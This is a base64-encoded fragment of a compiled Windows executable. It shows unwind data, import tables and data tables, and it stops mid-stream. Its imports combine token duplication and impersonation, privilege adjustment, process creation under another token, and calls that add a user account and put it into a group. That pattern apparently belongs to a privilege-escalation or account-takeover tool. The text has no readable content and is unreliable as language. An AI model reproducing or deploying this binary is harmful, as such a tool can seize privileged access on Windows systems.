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IBRHVwbGljYXRlSGFuZGxlABIET3BlblByb2Nlc3MANARQcm9jZXNzSWRUb1Nlc3Npb25JZAAAjwVTbGVlcABqAkdldExhc3RFcnJvcgAAOQNHbG9iYWxBbGxvYwCJAENsb3NlSGFuZGxlAFEDSGVhcEFsbG9jALgCR2V0UHJvY0FkZHJlc3MAACECR2V0Q3VycmVudFByb2Nlc3NJZAC+AkdldFByb2Nlc3NIZWFwAACBAkdldE1vZHVsZUhhbmRsZVcAAEtFUk5FTDMyLmRsbAAAcAFHZXRUb2tlbkluZm9ybWF0aW9uAKkBTG9va3VwQWNjb3VudFNpZFcA8QBEdXBsaWNhdGVUb2tlbkV4AACLAENyZWF0ZVByb2Nlc3NBc1VzZXJXAAAVAk9wZW5Qcm9jZXNzVG9rZW4AAIsBSW1wZXJzb25hdGVMb2dnZWRPblVzZXIAjQBDcmVhdGVQcm9jZXNzV2l0aFRva2VuVwBsAUdldFNpZFN1YkF1dGhvcml0eQAAbQFHZXRTaWRTdWJBdXRob3JpdHlDb3VudAD0AlNldFRva2VuSW5mb3JtYXRpb24AwQJSZXZlcnRUb1NlbGYAAB8AQWRqdXN0VG9rZW5Qcml2aWxlZ2VzAK8BTG9va3VwUHJpdmlsZWdlVmFsdWVXAEFEVkFQSTMyLmRsbAAA6QBOZXRVc2VyQWRkAACJAE5ldEdyb3VwQWRkVXNlcgBORVRBUEkzMi5kbGwAAOsBTnRRdWVyeU9iamVjdABudGRsbC5kbGwA1QRSdGxDYXB0dXJlQ29udGV4dADcBFJ0bExvb2t1cEZ1bmN0aW9uRW50cnkAAOMEUnRsVmlydHVhbFVud2luZAAAwAVVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAH8FU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAJ4FVGVybWluYXRlUHJvY2VzcwAAjANJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AFIEUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAJQJHZXRDdXJyZW50VGhyZWFkSWQAAPMCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAbwNJbml0aWFsaXplU0xpc3RIZWFkAIUDSXNEZWJ1Z2dlclByZXNlbnQA2gJHZXRTdGFydHVwSW5mb1cA4gRSdGxVbndpbmRFeABBBVNldExhc3RFcnJvcgAAOAFFbnRlckNyaXRpY2FsU2VjdGlvbgAAxANMZWF2ZUNyaXRpY2FsU2VjdGlvbgAAFAFEZWxldGVDcml0aWNhbFNlY3Rpb24AawNJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uQW5kU3BpbkNvdW50ALAFVGxzQWxsb2MAALIFVGxzR2V0VmFsdWUAswVUbHNTZXRWYWx1ZQCxBVRsc0ZyZWUAtAFGcmVlTGlicmFyeQDKA0xvYWRMaWJyYXJ5RXhXAABoBFJhaXNlRXhjZXB0aW9uAADcAkdldFN0ZEhhbmRsZQAAJQZXcml0ZUZpbGUAfQJHZXRNb2R1bGVGaWxlTmFtZVcAAGcBRXhpdFByb2Nlc3MAgAJHZXRNb2R1bGVIYW5kbGVFeFcAAN8BR2V0Q29tbWFuZExpbmVBAOABR2V0Q29tbWFuZExpbmVXAFUDSGVhcEZyZWUAAJ4AQ29tcGFyZVN0cmluZ1cAALgDTENNYXBTdHJpbmdXAABYAkdldEZpbGVUeXBlAFgDSGVhcFJlQWxsb2MAfgFGaW5kQ2xvc2UAhAFGaW5kRmlyc3RGaWxlRXhXAACVAUZpbmROZXh0RmlsZVcAkgNJc1ZhbGlkQ29kZVBhZ2UAuwFHZXRBQ1AAAKECR2V0T0VNQ1AAAMoBR2V0Q1BJbmZvAPYDTXVsdGlCeXRlVG9XaWRlQ2hhcgARBldpZGVDaGFyVG9NdWx0aUJ5dGUAQQJHZXRFbnZpcm9ubWVudFN0cmluZ3NXAACzAUZyZWVFbnZpcm9ubWVudFN0cmluZ3NXACQFU2V0RW52aXJvbm1lbnRWYXJpYWJsZVcAWwVTZXRTdGRIYW5kbGUAAOECR2V0U3RyaW5nVHlwZVcAAKgBRmx1c2hGaWxlQnVmZmVycwAACQJHZXRDb25zb2xlT3V0cHV0Q1AAAAUCR2V0Q29uc29sZU1vZGUAAFYCR2V0RmlsZVNpemVFeAAzBVNldEZpbGVQb2ludGVyRXgAAFoDSGVhcFNpemUAAM4AQ3JlYXRlRmlsZVcAJAZXcml0ZUNvbnNvbGVXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKi3y2ZKwAAzV0g0mbU////////AQAAAAEAAAACAAAAAAAIAAAAAAAAAAACAAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAwAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAIAACgoKAAAAAAAAAAAAAABCagFAAQAAAP////8AAAAAAAAAAAAAAABAZQFAAQAAAAEAAAAAAAAAAQAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo8wFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACjzAUABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKPMBQAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo8wFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACjzAUABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHD4AUABAAAAAAAAAAAAAAAAAAAAAAAAAMBnAUABAAAAQGkBQAEAAABQbAFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDxAUABAAAAMPMBQAEAAABDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5egAAAAAAAEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6AAAAAAAAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQIECAAAAAAAAAAAAAAAAKQDAABggnmCIQAAAAAAAACm3wAAAAAAAKGlAAAAAAAAgZ/g/AAAAABAfoD8AAAAAKgDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABA/gAAAAAAALUDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABB/gAAAAAAALYDAADPouSiGgDlouiiWwAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABAfqH+AAAAAFEFAABR2l7aIABf2mraMgAAAAAAAAAAAAAAAAAAAAAAgdPY3uD5AAAxfoH+AAAAAAj5AUABAAAAqAwCQAEAAACoDAJAAQAAAKgMAkABAAAAqAwCQAEAAACoDAJAAQAAAKgMAkABAAAAqAwCQAEAAACoDAJAAQAAAKgMAkABAAAAf39/f39/f38M+QFAAQAAAKwMAkABAAAArAwCQAEAAACsDAJAAQAAAKwMAkABAAAArAwCQAEAAACsDAJAAQAAAKwMAkABAAAALgAAAC4AAAD+////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQECAgICAgICAgICAgICAgICAwMDAwMDAwMAAAAAAAAAAP7/////////AQAAAAAAAAABAAAAdZgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQAABjEAAAuNQBAHAQAAAfHAAAxNQBACAcAACCHAAA7NQBAJAcAADyHAAA7NQBABAdAAAuHQAAANUBADAdAADmHQAABNUBAOgdAAD4HQAADNUBAPgdAAARHgAADNUBABQeAACQHwAAFNUBAJAfAACiHwAADNUBAKQfAADYHwAABNUBANgfAACqIAAAVNUBAKwgAAAdIQAAXNUBACAhAABZIQAADNUBAFwhAAClIQAABNUBAKghAAAzIgAABNUBADQiAADMIgAAaNUBAMwiAADwIgAABNUBAPAiAAAZIwAABNUBABwjAABWIwAABNUBAFgjAABvIwAADNUBAHAjAAAcJAAAkNUBAFAkAABrJAAADNUBAJAkAADbJQAAnNUBAOQlAAA1JgAADNUBAEgmAACjJgAArNUBAKQmAADgJgAArNUBAOAmAAAcJwAArNUBABwnAADIKAAAuNUBAOAoAADXKgAA1NUBANgqAAAAKwAADNUBAAArAAAZKwAADNUBABwrAACJKwAA8NUBAJArAACiKwAADNUBAKQrAAC2KwAADNUBANArAADgKwAAINYBAPArAAB4LwAALNYBAJAvAACoLwAAMNYBALAvAACxLwAANNYBAMAvAADBLwAAONYBAPwvAAAbMAAADNUBABwwAAA1MAAADNUBADgwAAD3MAAAPNYBAPgwAAA/MQAADNUBAEAxAABiMQAADNUBAGQxAACqMQAABNUBAKwxAADjMQAABNUBAOQxAAAyMwAATNYBADQzAAB5MwAABNUBAHwzAADCMwAABNUBAMQzAAAKNAAABNUBAAw0AABdNAAArNUBAGA0AADBNAAAPNYBAOA0AADwNAAAaNYBAAA1AAB1OwAAdNYBAJA7AADQOwAAeNYBAOA7AAAKPAAAgNYBABA8AAA2PAAAiNYBAEA8AACHPAAAkNYBAJA8AACvPQAAmNYBAMQ9AAAfPgAABNUBADg+AAA6QQAAzNYBADxBAADhRwAA6NYBAORHAAB/SAAAPNYBAIBIAAD2SAAAsNYBAPhIAAAhSQAAxNYBACxJAACRSQAABNUBAJRJAADRSQAALNgBANRJAACmSwAA4NcBAKhLAABOTAAAsNYBAFBMAAD5TAAAsNYBADxNAADDTQAAJNgBAMRNAABnTgAAJNgBAGhOAAD1TgAAJNgBAPhOAACcTwAAJNgBAJxPAAAnUAAADNgBAChQAACeUAAAANgBAKBQAADNUQAAqNcBAOhSAACJUwAAUNcBAIxTAAAvVAAAUNgBADBUAABDVgAAQNcBAERWAAC7WAAAmNYBALxYAAAsWQAABNUBACxZAADOWQAABNUBANBZAAA9WwAADNUBAEBbAADTXAAADNUBANRcAABYXwAAZNcBAFhfAAAiYgAAZNgBAAxjAACFYwAAPNYBAIhjAABDZQAAhNcBAERlAAAjZwAAmNgBACRnAADpZwAAfNcBAOxnAACSaAAAiNgBAJRoAAATagAAmNYBABRqAACZawAAmNYBAJxrAAAibAAArNUBACRsAAC6bAAABNUBALxsAACDbQAAPNYBAIRtAAAebgAADNUBACBuAABBbwAAkNcBAERvAAAqcAAAqNgBACxwAADRcAAAyNcBANRwAADJcQAAJNcBAMxxAABXcgAAHNcBAFhyAACxcwAAANcBANBzAABSdQAAsNYBAOR1AACEdwAA0NgBAIR3AADhdwAABNUBAOR3AABmeQAAvNgBAGh5AADPeQAArNUBANB5AADjegAA9NgBAOR6AAAlewAA6NgBACh7AADZewAADNkBANx7AAD2ewAADNUBAPh7AAASfAAADNUBABR8AABPfAAADNUBAFB8AACIfAAADNUBAIh8AADWfAAADNUBAOB8AABEfQAAsNYBAER9AACBfQAArNUBAIR9AAC8fQAASNkBALx9AAB9fgAAKNkBAIx+AABIfwAAHNkBAEh/AACSfwAABNUBAJR/AADvfwAABNUBACSAAABggAAADNUBAGyAAACpgAAADNUBAKyAAADRgAAADNUBAOSAAABSgQAAdNkBAGCBAACOgQAAbNkBAJCBAAD5gQAABNUBAASCAAAvggAADNUBADiCAABzggAA3NkBAHSCAACvggAAANoBALCCAABghAAArNkBAGCEAAB2hQAAxNkBAIiFAADChQAApNkBAOyFAAA0hgAAnNkBAEiGAABrhgAADNUBAGyGAAB8hgAADNUBAHyGAAC5hgAABNUBAMSGAAAEhwAABNUBAASHAABfhwAADNUBAHSHAACphwAADNUBAKyHAADMhwAAJNoBAMyHAAAriAAABNUBACyIAACCiAAADNUBAKCIAAAdiQAASNoBAEyJAADBiQAABNUBAMSJAAAfiwAATNoBACiLAADWiwAAbNoBANiLAAD2iwAAxNYBAPiLAAA/jAAADNUBAIiMAADWjAAArNUBANiMAAD4jAAADNUBAPiMAAAYjQAADNUBABiNAABVjQAAgNoBAFiNAAAujwAATNYBADCPAAB+jwAABNUBAICPAABckAAAkNoBAFyQAACkkAAABNUBAKSQAADqkAAABNUBAOyQAAAykQAABNUBADSRAACFkQAArNUBAIiRAADpkQAAPNYBAOyRAADIkgAAkNoBAMiSAAAYkwAArNUBABiTAABJkwAAiNoBAEyTAACNkwAABNUBAJCTAABBlAAApNoBAESUAADelAAA0NoBAOCUAADAlQAA9NoBAMCVAAAdlgAAyNoBACCWAACalgAAPNYBAJyWAADnlgAABNUBAPCWAAAwlwAABNUBADCXAAAdmAAAPNsBACCYAAAsmQAAmNYBACyZAABnmQAAHNsBAGiZAAComQAArNUBAKiZAADXmQAADNUBANiZAABEmgAAWNsBAESaAABMmwAAZNsBAEybAACLmwAAkNsBAIybAADJmwAA/NsBAMybAAARnAAAtNsBABScAABznAAA2NsBAHScAABBnQAAgNsBAESdAABknQAAgNoBAGSdAABZngAAiNsBAFyeAADDngAArNUBAMSeAACYnwAAPNYBAJifAAA/oAAABNUBAECgAAAMoQAAPNYBAAyhAABFoQAADNUBAEihAABqoQAADNUBAGyhAACdoQAABNUBAKChAADRoQAABNUBANShAABOogAArNUBAFCiAACuogAABNUBALCiAADaogAAxNYBANyiAAAGowAAxNYBAAijAACGpAAAkNoBAJCkAAAspgAAINwBAFSpAADUrAAAYNwBANSsAADErQAAkNoBAMStAACWrwAASNwBAJivAAD9sAAAfNwBAACxAABFsgAAlNwBAEiyAABeswAAJNcBAGCzAACXtgAAMNwBAJi2AAC+tgAADNUBAPC2AAA2twAABNUBADi3AAAAuAAArNUBAAC4AAA5uAAAqNwBADy4AAAguQAArNUBADS5AAD+vAAAsNwBAAC9AACJvgAA1NwBAJS+AABOwAAAbN0BAFDAAADNwAAAEN0BANDAAABgwQAAsNYBAGDBAABBwwAAUN0BAETDAAACxQAAQN0BAATFAAC8xQAAGN0BALzFAAAcxgAADNUBABzGAAA4xgAADNUBADjGAADxyAAA8NwBAFDJAAD9yQAAkN0BAADKAACfygAAsNYBAKDKAADCzQAA1NwBAMTNAACzzgAAnN0BALzOAAAEzwAABNUBACDPAABXzwAABNUBAHTPAACwzwAABNUBALDPAABV0AAAsNYBAFjQAACo0AAAyN0BAKjQAABQ0QAA2N0BAKDRAABa0gAAtN0BAFzSAADR0gAADNUBAPDSAAD60wAABN4BAPzTAABo1AAAgNoBAGjUAADA1AAAPNYBAMDUAADI1QAADN4BAPzVAACJ1wAAHN4BABjYAACO2QAAsNYBALjZAADu2QAAgNoBABjaAADA2gAADNUBAMDaAAAu2wAARN4BADDbAACV2wAArNUBAJjbAAAt3AAAsNYBADDcAABM3AAADNUBAFjcAADY3AAAPNYBANjcAAAU3QAArNUBABzdAABL3QAABNUBAEzdAACA3QAAaN4BAIDdAADF3QAAxN4BAMjdAAD23QAAbNkBABjeAACC4AAAiN4BAITgAAAz4QAAxNkBADThAAC34QAArNUBALjhAAAa4gAA6N4BABziAACo4gAAFN8BAKjiAAA54wAADN8BADzjAAAo6AAAgN8BACjoAAAq6QAApN8BACzpAABF6gAApN8BAEjqAAC46wAAxN8BALjrAACj7AAAON8BAKTsAACH7wAAaN8BAJDvAADb7wAAEN0BANzvAAAV8AAAfNcBABjwAACO8QAA6N8BA